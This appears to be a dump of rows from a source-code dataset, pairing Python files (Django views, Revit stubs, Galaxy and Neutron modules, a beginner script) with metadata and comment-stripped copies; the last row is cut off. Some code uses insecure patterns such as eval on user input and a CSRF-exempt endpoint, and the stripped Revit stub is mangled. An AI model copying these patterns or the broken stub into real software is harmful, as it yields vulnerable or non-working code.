] | null | null | null | import math
lado = eval(input("Informe o lado do quadrado em cm: "))
area = math.pow(lado,2)
perim = lado*4
print('A área do quadrado é igual a: ', area, 'cm')
print('O perímetro do quadro é igual a: ', perim, 'cm') | 21.9 | 56 | 0.6621 | import math
lado = eval(input("Informe o lado do quadrado em cm: "))
area = math.pow(lado,2)
perim = lado*4
print('A área do quadrado é igual a: ', area, 'cm')
print('O perímetro do quadro é igual a: ', perim, 'cm') | true | true |
f7233ab2b8e1a5cfddc61416c5274d6fab1e8f41 | 1,213 | py | Python | stackdio/ui/utils.py | hdmillerdr/stackdio | 84be621705031d147e104369399b872d5093ef64 | [
"Apache-2.0"
] | 9 | 2015-12-18T22:44:55.000Z | 2022-02-07T19:34:44.000Z | stackdio/ui/utils.py | hdmillerdr/stackdio | 84be621705031d147e104369399b872d5093ef64 | [
"Apache-2.0"
] | 77 | 2015-01-12T17:49:38.000Z | 2017-02-24T17:57:46.000Z | stackdio/ui/utils.py | hdmillerdr/stackdio | 84be621705031d147e104369399b872d5093ef64 | [
"Apache-2.0"
] | 11 | 2015-01-23T15:50:19.000Z | 2022-02-07T19:34:45.000Z | # -*- coding: utf-8 -*-
# Copyright 2017, Digital Reasoning
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import unicode_literals
from django.db.models import Model
def get_object_list(user, model_cls, pk_field='id'):
    """Return a permission-aware listing of all ``model_cls`` objects.

    Only objects the given ``user`` may view are included; each entry also
    records whether the user may delete or update that object.

    :param user: user whose object-level permissions are checked.
    :param model_cls: a Django model class; all of its objects are scanned.
    :param pk_field: attribute used as the entry's ``id`` (default ``'id'``).
    :returns: list of dicts with ``id``, ``can_delete`` and ``can_update``.
    :raises TypeError: if ``model_cls`` is not a Django model class.
    """
    # Explicit check instead of ``assert`` -- asserts are stripped when
    # Python runs with -O, which would silently disable this validation.
    if not (isinstance(model_cls, type) and issubclass(model_cls, Model)):
        raise TypeError('model_cls must be a Django model class')

    model_name = model_cls._meta.model_name

    # Build the permission codenames once instead of on every iteration.
    view_perm = 'view_%s' % model_name
    delete_perm = 'delete_%s' % model_name
    update_perm = 'update_%s' % model_name

    object_list = []
    for obj in model_cls.objects.all():
        if user.has_perm(view_perm, obj):
            object_list.append({
                'id': getattr(obj, pk_field),
                'can_delete': user.has_perm(delete_perm, obj),
                'can_update': user.has_perm(update_perm, obj),
            })
    return object_list
| 32.783784 | 75 | 0.6892 |
from __future__ import unicode_literals
from django.db.models import Model
def get_object_list(user, model_cls, pk_field='id'):
assert issubclass(model_cls, Model)
model_name = model_cls._meta.model_name
object_list = []
for obj in model_cls.objects.all():
if user.has_perm('view_%s' % model_name, obj):
object_list.append({
'id': getattr(obj, pk_field),
'can_delete': user.has_perm('delete_%s' % model_name, obj),
'can_update': user.has_perm('update_%s' % model_name, obj),
})
return object_list
| true | true |
f7233b3ab8ec3d79780576a9151a6f127bef71f2 | 1,083 | py | Python | stubs.min/Autodesk/Revit/DB/__init___parts/GridSegmentDirection.py | ricardyn/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2021-02-02T13:39:16.000Z | 2021-02-02T13:39:16.000Z | stubs.min/Autodesk/Revit/DB/__init___parts/GridSegmentDirection.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/Autodesk/Revit/DB/__init___parts/GridSegmentDirection.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class GridSegmentDirection(Enum,IComparable,IFormattable,IConvertible):
"""
Specify one of the four adjacent segments to a
GridNode.
See Autodesk.Revit.DB.DividedSurface.
enum GridSegmentDirection,values: NegativeU (1),NegativeV (3),PositiveU (0),PositiveV (2)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
NegativeU=None
NegativeV=None
PositiveU=None
PositiveV=None
value__=None
| 28.5 | 215 | 0.676824 | class GridSegmentDirection(Enum,IComparable,IFormattable,IConvertible):
""" __format__(formattable: IFormattable,format: str) -> str """
def __ge__(self,*args):
pass
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
NegativeU=None
NegativeV=None
PositiveU=None
PositiveV=None
value__=None
| true | true |
f7233bd5f0b8673116db69bc22d329089c672bd0 | 3,971 | py | Python | python/wheedle/app.py | kpvdr/actions-artifact-poller | 2660efb8195e1eddf8f22d694282027581da7df4 | [
"Apache-2.0"
] | 1 | 2020-10-20T15:26:13.000Z | 2020-10-20T15:26:13.000Z | python/wheedle/app.py | kpvdr/actions-artifact-poller | 2660efb8195e1eddf8f22d694282027581da7df4 | [
"Apache-2.0"
] | 3 | 2020-11-11T14:55:43.000Z | 2021-01-06T17:19:16.000Z | python/wheedle/app.py | kpvdr/actions-artifact-poller | 2660efb8195e1eddf8f22d694282027581da7df4 | [
"Apache-2.0"
] | null | null | null | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""
Main application
"""
import logging as _logging
import multiprocessing as _mp
import fortworth as _fortworth
import wheedle.artifact_poller as _apoller
import wheedle.commit_poller as _cpoller
import wheedle.configuration as _config
import wheedle.errors as _errors
# pylint: disable=too-few-public-methods
class Application:
    """Poller application.

    Loads the wheedle configuration, configures logging, then launches one
    artifact poller per configured poller name — plus a commit poller for
    those that have one — each in its own process.
    """

    def __init__(self, home, data_dir=None, config_file=None):
        self._home = home
        self._log = _logging.getLogger(self.__class__.__name__)
        self._process_list = []
        # Fall back to <home>/wheedle.conf when no config file is given.
        if config_file is None:
            config_file = _fortworth.join(home, 'wheedle.conf')
        self._config = _config.Configuration(config_file, data_dir)
        try:
            _logging.basicConfig(
                level=self._config['Logging']['default_log_level'],
                format='%(asctime)s %(name)s - %(levelname)s: %(message)s',
                datefmt='%Y-%m-%d %H:%M:%S %Z')
        except ValueError as err:
            # An invalid log level name in the config is a config-file error.
            raise _errors.ConfigFileError(self._config.config_file_name(), 'Logging', err)
        self._log.info('Data directory: %s', self._config.data_dir())

    def run(self):
        """ Run the application. This starts each of the configured artifact and commit pollers """
        try:
            self._start_pollers(self._config.poller_names())
            # Block until every poller process exits.
            for poller_process in self._process_list:
                poller_process.join()
        except _errors.PollerError as err:
            self._log.error(err)
            _fortworth.exit(1)
        except KeyboardInterrupt:
            print(' KeyboardInterrupt')
        self._log.info('exit')

    def _start_pollers(self, poller_name_list):
        # For each poller: optionally start its commit poller first, sharing
        # an Event with the artifact poller so the two can synchronize.
        for poller_name in poller_name_list:
            sync_event = None
            if self._config.has_commit_poller(poller_name):
                sync_event = _mp.Event()
                self._start_commit_poller(poller_name, sync_event)
            self._start_artifact_poller(poller_name, sync_event)

    def _start_artifact_poller(self, name, ap_event):
        """ Start the named artifact poller """
        proc = _mp.Process(target=_apoller.ArtifactPoller.run,
                           args=(self._config, name, ap_event),
                           name=name + '-AP')
        proc.start()
        self._process_list.append(proc)

    def _start_commit_poller(self, name, ap_event):
        """ Start the named commit poller """
        proc = _mp.Process(target=_cpoller.CommitPoller.run,
                           args=(self._config, name, ap_event),
                           name=name + '-CP')
        proc.start()
        self._process_list.append(proc)
if __name__ == '__main__':
    # Script entry point: run the poller application rooted at the
    # current directory; configuration errors are fatal.
    try:
        Application(_fortworth.current_dir()).run()
    except _errors.PollerError as err:
        print(err)
        _fortworth.exit(1)
| 38.553398 | 99 | 0.634097 |
import logging as _logging
import multiprocessing as _mp
import fortworth as _fortworth
import wheedle.artifact_poller as _apoller
import wheedle.commit_poller as _cpoller
import wheedle.configuration as _config
import wheedle.errors as _errors
class Application:
def __init__(self, home, data_dir=None, config_file=None):
self._home = home
self._log = _logging.getLogger(self.__class__.__name__)
self._process_list = []
config_file = config_file if config_file is not None else _fortworth.join(home,
'wheedle.conf')
self._config = _config.Configuration(config_file, data_dir)
try:
_logging.basicConfig(level=self._config['Logging']['default_log_level'],
format='%(asctime)s %(name)s - %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S %Z')
except ValueError as err:
raise _errors.ConfigFileError(self._config.config_file_name(), 'Logging', err)
self._log.info('Data directory: %s', self._config.data_dir())
def run(self):
try:
self._start_pollers(self._config.poller_names())
for process in self._process_list:
process.join()
except _errors.PollerError as err:
self._log.error(err)
_fortworth.exit(1)
except KeyboardInterrupt:
print(' KeyboardInterrupt')
self._log.info('exit')
def _start_pollers(self, poller_name_list):
for poller_name in poller_name_list:
ap_event = None
if self._config.has_commit_poller(poller_name):
ap_event = _mp.Event()
self._start_commit_poller(poller_name, ap_event)
self._start_artifact_poller(poller_name, ap_event)
def _start_artifact_poller(self, name, ap_event):
artifact_poller_process = _mp.Process(target=_apoller.ArtifactPoller.run,
args=(self._config, name, ap_event),
name=name + '-AP')
artifact_poller_process.start()
self._process_list.append(artifact_poller_process)
def _start_commit_poller(self, name, ap_event):
commit_poller_process = _mp.Process(target=_cpoller.CommitPoller.run,
args=(self._config, name, ap_event),
name=name + '-CP')
commit_poller_process.start()
self._process_list.append(commit_poller_process)
if __name__ == '__main__':
try:
APP = Application(_fortworth.current_dir())
APP.run()
except _errors.PollerError as err:
print(err)
_fortworth.exit(1)
| true | true |
f7233c75ff594cef6295b4e8cfce6d7da0477e0e | 3,650 | py | Python | src/application/blog/views.py | AriyaOk/study_python | dd2b24dc5a94d2cb100463f49739453d4e7b6203 | [
"MIT"
] | null | null | null | src/application/blog/views.py | AriyaOk/study_python | dd2b24dc5a94d2cb100463f49739453d4e7b6203 | [
"MIT"
] | 10 | 2020-10-20T18:09:16.000Z | 2021-09-22T19:45:32.000Z | src/application/blog/views.py | AriyaOk/study_python | dd2b24dc5a94d2cb100463f49739453d4e7b6203 | [
"MIT"
] | null | null | null | from functools import wraps
from typing import Dict
from django import forms
from django.db import transaction
from django.db.models import F
from django.http import HttpResponse
from django.http import JsonResponse
from django.urls import reverse_lazy
from django.utils.decorators import method_decorator
from django.views import View
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import CreateView
from django.views.generic import DeleteView
from django.views.generic import ListView
from django.views.generic import RedirectView
from django.views.generic import UpdateView
from application.blog.models import BlogPost
from application.blog.models import UserLike
from framework.mixins import ExtendedContextMixin
class PostForm(forms.ModelForm):
    """ModelForm for creating/editing a BlogPost (title and content only)."""

    class Meta:
        model = BlogPost
        fields = ["title", "content"]
        # Keep the inline creation form compact: single-line title,
        # two-row textarea for the content.
        widgets = {
            "title": forms.TextInput(),
            "content": forms.Textarea(attrs={"rows": 2}),
        }
class AllPostsView(ExtendedContextMixin, ListView):
    """List every blog post and expose an empty creation form in context."""

    template_name = "blog/all_posts.html"
    model = BlogPost

    def get_extended_context(self) -> Dict:
        # The template renders this form inline for creating new posts.
        return {"form": PostForm()}
class NewPostView(CreateView):
    """POST-only endpoint that creates a blog post authored by the requester."""

    http_method_names = ["post"]
    model = BlogPost
    fields = ["content", "title"]
    success_url = reverse_lazy("blog:all")

    def form_valid(self, form):
        # Populate the instance without saving so the author can be stamped
        # before the parent class persists it.
        new_post = form.save(commit=False)
        new_post.author = self.request.user
        return super().form_valid(form)
class DelAll(RedirectView):
    """Delete every blog post, then redirect back to the post list."""

    def get_redirect_url(self, *args, **kwargs):
        # Side effect first: wipe all posts, then send the user home.
        BlogPost.objects.all().delete()
        return reverse_lazy("blog:all")
class DeletePostView(DeleteView):
    """POST-only endpoint that deletes a single BlogPost, then redirects
    back to the post list."""
    http_method_names = ["post"]
    model = BlogPost
    success_url = reverse_lazy("blog:all")
class PostView(UpdateView):
    """Display and edit a single blog post."""

    model = BlogPost
    fields = ["content", "title"]
    template_name = "blog/post.html"
    success_url = reverse_lazy("blog:all")

    def form_valid(self, form):
        # Mark the post as edited before the parent class saves it.
        self.object.edited = True
        return super().form_valid(form)
@method_decorator(csrf_exempt, name="dispatch")
class PostLike(View):
    """Report (GET) or toggle (POST) the like state of a blog post.

    NOTE(review): GET reads the denormalized ``BlogPost.nr_likes`` field,
    while POST recounts ``UserLike`` rows; the counter updates in ``post``
    are commented out, so the two values can drift — confirm which source
    of truth is intended.
    """
    def get(self, request, *args, **kwargs):
        # Return the stored like counter as plain text.
        nr = BlogPost.objects.get(pk=kwargs.get("pk")).nr_likes
        payload = str(nr)
        return HttpResponse(payload, content_type="text/plain")
    def post(self, request, *args, **kwargs):
        # Default (failure) payload; overwritten on success below.
        payload = {
            "ok": False,
            "nr_likes": 0,
            "is_like": False,
            "reason": "unknown reason",
        }
        try:
            pk = kwargs.get("pk", 0)
            post = BlogPost.objects.get(pk=pk)
            user = self.request.user
        except Exception:
            payload.update({"reason": "post not found"})
        else:
            try:
                userlike = UserLike.objects.get(user=user, post=post)
            except UserLike.DoesNotExist:
                # No existing like from this user: create one (like).
                userlike = UserLike(user=user, post=post)
                userlike.save()
                # post.nr_likes += 1
                # post.save()
                is_like = True
            else:
                # User already liked this post: remove the like (unlike).
                userlike.delete()
                # post.nr_likes -= 1
                # post.save()
                is_like = False
            # Recount likes from the UserLike rows for the response.
            post = BlogPost.objects.get(pk=pk)
            nr_like = UserLike.objects.filter(post=post).count()
            payload.update(
                {
                    "ok": True,
                    "nr_likes": nr_like,
                    "is_like": is_like,
                    "reason": None,
                }
            )
        return JsonResponse(payload)
| 27.862595 | 69 | 0.607945 | from functools import wraps
from typing import Dict
from django import forms
from django.db import transaction
from django.db.models import F
from django.http import HttpResponse
from django.http import JsonResponse
from django.urls import reverse_lazy
from django.utils.decorators import method_decorator
from django.views import View
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import CreateView
from django.views.generic import DeleteView
from django.views.generic import ListView
from django.views.generic import RedirectView
from django.views.generic import UpdateView
from application.blog.models import BlogPost
from application.blog.models import UserLike
from framework.mixins import ExtendedContextMixin
class PostForm(forms.ModelForm):
class Meta:
model = BlogPost
fields = ["title", "content"]
widgets = {
"title": forms.TextInput(),
"content": forms.Textarea(attrs={"rows": 2}),
}
class AllPostsView(ExtendedContextMixin, ListView):
template_name = "blog/all_posts.html"
model = BlogPost
def get_extended_context(self) -> Dict:
context = {"form": PostForm()}
return context
class NewPostView(CreateView):
http_method_names = ["post"]
model = BlogPost
fields = ["content", "title"]
success_url = reverse_lazy("blog:all")
def form_valid(self, form):
post = form.save(commit=False)
post.author = self.request.user
return super().form_valid(form)
class DelAll(RedirectView):
def get_redirect_url(self, *args, **kwargs):
BlogPost.objects.all().delete()
return reverse_lazy("blog:all")
class DeletePostView(DeleteView):
http_method_names = ["post"]
model = BlogPost
success_url = reverse_lazy("blog:all")
class PostView(UpdateView):
model = BlogPost
fields = ["content", "title"]
template_name = "blog/post.html"
success_url = reverse_lazy("blog:all")
def form_valid(self, form):
self.object.edited = True
return super().form_valid(form)
@method_decorator(csrf_exempt, name="dispatch")
class PostLike(View):
def get(self, request, *args, **kwargs):
nr = BlogPost.objects.get(pk=kwargs.get("pk")).nr_likes
payload = str(nr)
return HttpResponse(payload, content_type="text/plain")
def post(self, request, *args, **kwargs):
payload = {
"ok": False,
"nr_likes": 0,
"is_like": False,
"reason": "unknown reason",
}
try:
pk = kwargs.get("pk", 0)
post = BlogPost.objects.get(pk=pk)
user = self.request.user
except Exception:
payload.update({"reason": "post not found"})
else:
try:
userlike = UserLike.objects.get(user=user, post=post)
except UserLike.DoesNotExist:
userlike = UserLike(user=user, post=post)
userlike.save()
is_like = True
else:
userlike.delete()
is_like = False
post = BlogPost.objects.get(pk=pk)
nr_like = UserLike.objects.filter(post=post).count()
payload.update(
{
"ok": True,
"nr_likes": nr_like,
"is_like": is_like,
"reason": None,
}
)
return JsonResponse(payload)
| true | true |
f7233cc503bee7eeaf7e047cdce25d7b9557c9fd | 2,161 | py | Python | lib/galaxy/web/framework/middleware/static.py | ramezrawas/galaxy-1 | c03748dd49c060a68d07bce56eae33e0ba154414 | [
"CC-BY-3.0"
] | 6 | 2018-11-03T22:43:35.000Z | 2022-02-15T17:51:33.000Z | lib/galaxy/web/framework/middleware/static.py | igorhollaender/OBSOLETE_sirv_dashboard | 85aec60b80ef6f561d89398e3da5963d3d0f2aa4 | [
"CC-BY-3.0"
] | 3 | 2015-06-06T22:16:03.000Z | 2015-11-12T00:22:45.000Z | lib/galaxy/web/framework/middleware/static.py | igorhollaender/OBSOLETE_sirv_dashboard | 85aec60b80ef6f561d89398e3da5963d3d0f2aa4 | [
"CC-BY-3.0"
] | 10 | 2017-04-10T21:40:22.000Z | 2022-02-21T16:50:10.000Z | import os
from paste import request
from paste import fileapp
from paste.httpheaders import ETAG
from paste.urlparser import StaticURLParser
class CacheableStaticURLParser( StaticURLParser ):
    """StaticURLParser variant that adds a ``Cache-Control: max-age`` header.

    Serves files under *directory* exactly like paste's StaticURLParser,
    but when *cache_seconds* is given, every successful file response
    carries ``Cache-Control: max-age=<cache_seconds>``.
    """

    def __init__( self, directory, cache_seconds=None ):
        StaticURLParser.__init__( self, directory )
        # Seconds for Cache-Control max-age; None/0 disables the header.
        self.cache_seconds = cache_seconds

    def __call__( self, environ, start_response ):
        # WSGI entry point: resolve PATH_INFO under self.directory and serve
        # the matching file, a directory index, or an error response.
        path_info = environ.get('PATH_INFO', '')
        if not path_info:
            # See if this is a static file hackishly mapped.
            if os.path.exists(self.directory) and os.path.isfile(self.directory):
                app = fileapp.FileApp(self.directory)
                if self.cache_seconds:
                    app.cache_control( max_age=int( self.cache_seconds ) )
                return app(environ, start_response)
            return self.add_slash(environ, start_response)
        if path_info == '/':
            # @@: This should obviously be configurable
            filename = 'index.html'
        else:
            filename = request.path_info_pop(environ)
        full = os.path.join(self.directory, filename)
        if not os.path.exists(full):
            return self.not_found(environ, start_response)
        if os.path.isdir(full):
            # @@: Cache?
            # Bug fix: propagate cache_seconds when recursing into a
            # subdirectory, otherwise files below the top level were served
            # without the Cache-Control header.
            return self.__class__(full, self.cache_seconds)(environ, start_response)
        if environ.get('PATH_INFO') and environ.get('PATH_INFO') != '/':
            return self.error_extra_path(environ, start_response)
        if_none_match = environ.get('HTTP_IF_NONE_MATCH')
        if if_none_match:
            # Conditional GET: the ETag is the file mtime; answer 304 with
            # an empty body when the client's copy is still current.
            mytime = os.stat(full).st_mtime
            if str(mytime) == if_none_match:
                headers = []
                ETAG.update(headers, mytime)
                start_response('304 Not Modified', headers)
                return ['']  # empty body
        app = fileapp.FileApp(full)
        if self.cache_seconds:
            app.cache_control( max_age=int( self.cache_seconds ) )
        return app(environ, start_response)
def make_static(global_conf, document_root, cache_seconds=None):
    """Paste app_factory: build a static file server rooted at *document_root*."""
    return CacheableStaticURLParser(document_root, cache_seconds)
| 40.018519 | 81 | 0.631189 | import os
from paste import request
from paste import fileapp
from paste.httpheaders import ETAG
from paste.urlparser import StaticURLParser
class CacheableStaticURLParser( StaticURLParser ):
def __init__( self, directory, cache_seconds=None ):
StaticURLParser.__init__( self, directory )
self.cache_seconds = cache_seconds
def __call__( self, environ, start_response ):
path_info = environ.get('PATH_INFO', '')
if not path_info:
if os.path.exists(self.directory) and os.path.isfile(self.directory):
app = fileapp.FileApp(self.directory)
if self.cache_seconds:
app.cache_control( max_age=int( self.cache_seconds ) )
return app(environ, start_response)
return self.add_slash(environ, start_response)
if path_info == '/':
filename = 'index.html'
else:
filename = request.path_info_pop(environ)
full = os.path.join(self.directory, filename)
if not os.path.exists(full):
return self.not_found(environ, start_response)
if os.path.isdir(full):
return self.__class__(full)(environ, start_response)
if environ.get('PATH_INFO') and environ.get('PATH_INFO') != '/':
return self.error_extra_path(environ, start_response)
if_none_match = environ.get('HTTP_IF_NONE_MATCH')
if if_none_match:
mytime = os.stat(full).st_mtime
if str(mytime) == if_none_match:
headers = []
ETAG.update(headers, mytime)
start_response('304 Not Modified', headers)
return ['']
app = fileapp.FileApp(full)
if self.cache_seconds:
app.cache_control( max_age=int( self.cache_seconds ) )
return app(environ, start_response)
def make_static( global_conf, document_root, cache_seconds=None ):
return CacheableStaticURLParser( document_root, cache_seconds )
| true | true |
f7233e71a07e7c61d68b43770ba8d7053f1b01e4 | 5,136 | py | Python | neutron/agent/linux/ra.py | markmcclain/neutron | 3108d2dece0501dbb661e2f5a4bb530a199f9fde | [
"Apache-2.0"
] | 3 | 2016-08-07T01:25:54.000Z | 2021-03-01T10:19:14.000Z | neutron/agent/linux/ra.py | cyysu/neutron_read | 07d1a526d7d44ad0207d27e0ee04f1582541ab89 | [
"Apache-2.0"
] | null | null | null | neutron/agent/linux/ra.py | cyysu/neutron_read | 07d1a526d7d44ad0207d27e0ee04f1582541ab89 | [
"Apache-2.0"
] | 2 | 2016-09-10T13:21:10.000Z | 2016-12-23T01:44:53.000Z | # Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import jinja2
import netaddr
from oslo_config import cfg
from oslo_log import log as logging
import six
from neutron.agent.linux import external_process
from neutron.agent.linux import utils
from neutron.common import constants
# Service name and binary for the IPv6 router-advertisement daemon.
RADVD_SERVICE_NAME = 'radvd'
RADVD_SERVICE_CMD = 'radvd'
LOG = logging.getLogger(__name__)
# Config option: directory where per-router radvd.conf files are written.
OPTS = [
    cfg.StrOpt('ra_confs',
               default='$state_path/ra',
               help=_('Location to store IPv6 RA config files')),
]
cfg.CONF.register_opts(OPTS)
# Jinja template for one radvd "interface" stanza; the advertised flags
# depend on the subnet's ipv6_ra_mode (SLAAC, stateless or stateful DHCPv6).
CONFIG_TEMPLATE = jinja2.Template("""interface {{ interface_name }}
{
AdvSendAdvert on;
MinRtrAdvInterval 3;
MaxRtrAdvInterval 10;
{% if ra_mode == constants.DHCPV6_STATELESS %}
AdvOtherConfigFlag on;
{% endif %}
{% if ra_mode == constants.DHCPV6_STATEFUL %}
AdvManagedFlag on;
{% endif %}
{% if ra_mode in (constants.IPV6_SLAAC, constants.DHCPV6_STATELESS) %}
prefix {{ prefix }}
{
AdvOnLink on;
AdvAutonomous on;
};
{% endif %}
};
""")
class DaemonMonitor(object):
    """Manage the data and state of an radvd process."""
    def __init__(self, router_id, router_ns, process_monitor, dev_name_helper):
        # router_id: id of the router this radvd instance advertises for.
        # router_ns: network namespace radvd is spawned in.
        # process_monitor: external watchdog that respawns radvd if it dies.
        # dev_name_helper: callable mapping a port id to its device name.
        self._router_id = router_id
        self._router_ns = router_ns
        self._process_monitor = process_monitor
        self._dev_name_helper = dev_name_helper
    def _generate_radvd_conf(self, router_ports):
        # Build radvd.conf with one "interface" stanza per IPv6 subnet on
        # the router's ports; returns the path of the written file.
        radvd_conf = utils.get_conf_file_name(cfg.CONF.ra_confs,
                                              self._router_id,
                                              'radvd.conf',
                                              True)
        buf = six.StringIO()
        for p in router_ports:
            subnets = p.get('subnets', [])
            for subnet in subnets:
                prefix = subnet['cidr']
                # Only IPv6 subnets are advertised; IPv4 CIDRs are skipped.
                if netaddr.IPNetwork(prefix).version == 6:
                    interface_name = self._dev_name_helper(p['id'])
                    ra_mode = subnet['ipv6_ra_mode']
                    buf.write('%s' % CONFIG_TEMPLATE.render(
                        ra_mode=ra_mode,
                        interface_name=interface_name,
                        prefix=prefix,
                        constants=constants))
        utils.replace_file(radvd_conf, buf.getvalue())
        return radvd_conf
    def _get_radvd_process_manager(self, callback=None):
        # ProcessManager keyed by the router id so enable/disable and
        # monitoring all refer to the same pid file.
        return external_process.ProcessManager(
            uuid=self._router_id,
            default_cmd_callback=callback,
            namespace=self._router_ns,
            service=RADVD_SERVICE_NAME,
            conf=cfg.CONF)
    def _spawn_radvd(self, radvd_conf):
        # Launch radvd with the generated config and register it with the
        # external process monitor.
        def callback(pid_file):
            # we need to use -m syslog and f.e. not -m stderr (the default)
            # or -m stderr_syslog so that radvd 2.0+ will close stderr and
            # exit after daemonization; otherwise, the current thread will
            # be locked waiting for result from radvd that won't ever come
            # until the process dies
            radvd_cmd = [RADVD_SERVICE_CMD,
                         '-C', '%s' % radvd_conf,
                         '-p', '%s' % pid_file,
                         '-m', 'syslog']
            return radvd_cmd
        pm = self._get_radvd_process_manager(callback)
        pm.enable(reload_cfg=True)
        self._process_monitor.register(uuid=self._router_id,
                                       service_name=RADVD_SERVICE_NAME,
                                       monitored_process=pm)
        LOG.debug("radvd enabled for router %s", self._router_id)
    def enable(self, router_ports):
        """Start (or reconfigure) radvd if any port has an IPv6 subnet;
        otherwise stop the daemon."""
        for p in router_ports:
            for subnet in p['subnets']:
                if netaddr.IPNetwork(subnet['cidr']).version == 6:
                    LOG.debug("Enable IPv6 RA for router %s", self._router_id)
                    radvd_conf = self._generate_radvd_conf(router_ports)
                    self._spawn_radvd(radvd_conf)
                    return
        # Kill the daemon if it's running
        self.disable()
    def disable(self):
        """Stop radvd, deregister it from monitoring, remove its config."""
        self._process_monitor.unregister(uuid=self._router_id,
                                         service_name=RADVD_SERVICE_NAME)
        pm = self._get_radvd_process_manager()
        pm.disable()
        utils.remove_conf_files(cfg.CONF.ra_confs, self._router_id)
        LOG.debug("radvd disabled for router %s", self._router_id)
    @property
    def enabled(self):
        # True when the radvd process for this router is currently active.
        return self._get_radvd_process_manager().active
| 34.938776 | 79 | 0.603388 |
import jinja2
import netaddr
from oslo_config import cfg
from oslo_log import log as logging
import six
from neutron.agent.linux import external_process
from neutron.agent.linux import utils
from neutron.common import constants
RADVD_SERVICE_NAME = 'radvd'
RADVD_SERVICE_CMD = 'radvd'
LOG = logging.getLogger(__name__)
OPTS = [
cfg.StrOpt('ra_confs',
default='$state_path/ra',
help=_('Location to store IPv6 RA config files')),
]
cfg.CONF.register_opts(OPTS)
CONFIG_TEMPLATE = jinja2.Template("""interface {{ interface_name }}
{
AdvSendAdvert on;
MinRtrAdvInterval 3;
MaxRtrAdvInterval 10;
{% if ra_mode == constants.DHCPV6_STATELESS %}
AdvOtherConfigFlag on;
{% endif %}
{% if ra_mode == constants.DHCPV6_STATEFUL %}
AdvManagedFlag on;
{% endif %}
{% if ra_mode in (constants.IPV6_SLAAC, constants.DHCPV6_STATELESS) %}
prefix {{ prefix }}
{
AdvOnLink on;
AdvAutonomous on;
};
{% endif %}
};
""")
class DaemonMonitor(object):
def __init__(self, router_id, router_ns, process_monitor, dev_name_helper):
self._router_id = router_id
self._router_ns = router_ns
self._process_monitor = process_monitor
self._dev_name_helper = dev_name_helper
def _generate_radvd_conf(self, router_ports):
radvd_conf = utils.get_conf_file_name(cfg.CONF.ra_confs,
self._router_id,
'radvd.conf',
True)
buf = six.StringIO()
for p in router_ports:
subnets = p.get('subnets', [])
for subnet in subnets:
prefix = subnet['cidr']
if netaddr.IPNetwork(prefix).version == 6:
interface_name = self._dev_name_helper(p['id'])
ra_mode = subnet['ipv6_ra_mode']
buf.write('%s' % CONFIG_TEMPLATE.render(
ra_mode=ra_mode,
interface_name=interface_name,
prefix=prefix,
constants=constants))
utils.replace_file(radvd_conf, buf.getvalue())
return radvd_conf
def _get_radvd_process_manager(self, callback=None):
return external_process.ProcessManager(
uuid=self._router_id,
default_cmd_callback=callback,
namespace=self._router_ns,
service=RADVD_SERVICE_NAME,
conf=cfg.CONF)
def _spawn_radvd(self, radvd_conf):
def callback(pid_file):
# until the process dies
radvd_cmd = [RADVD_SERVICE_CMD,
'-C', '%s' % radvd_conf,
'-p', '%s' % pid_file,
'-m', 'syslog']
return radvd_cmd
pm = self._get_radvd_process_manager(callback)
pm.enable(reload_cfg=True)
self._process_monitor.register(uuid=self._router_id,
service_name=RADVD_SERVICE_NAME,
monitored_process=pm)
LOG.debug("radvd enabled for router %s", self._router_id)
def enable(self, router_ports):
for p in router_ports:
for subnet in p['subnets']:
if netaddr.IPNetwork(subnet['cidr']).version == 6:
LOG.debug("Enable IPv6 RA for router %s", self._router_id)
radvd_conf = self._generate_radvd_conf(router_ports)
self._spawn_radvd(radvd_conf)
return
# Kill the daemon if it's running
self.disable()
def disable(self):
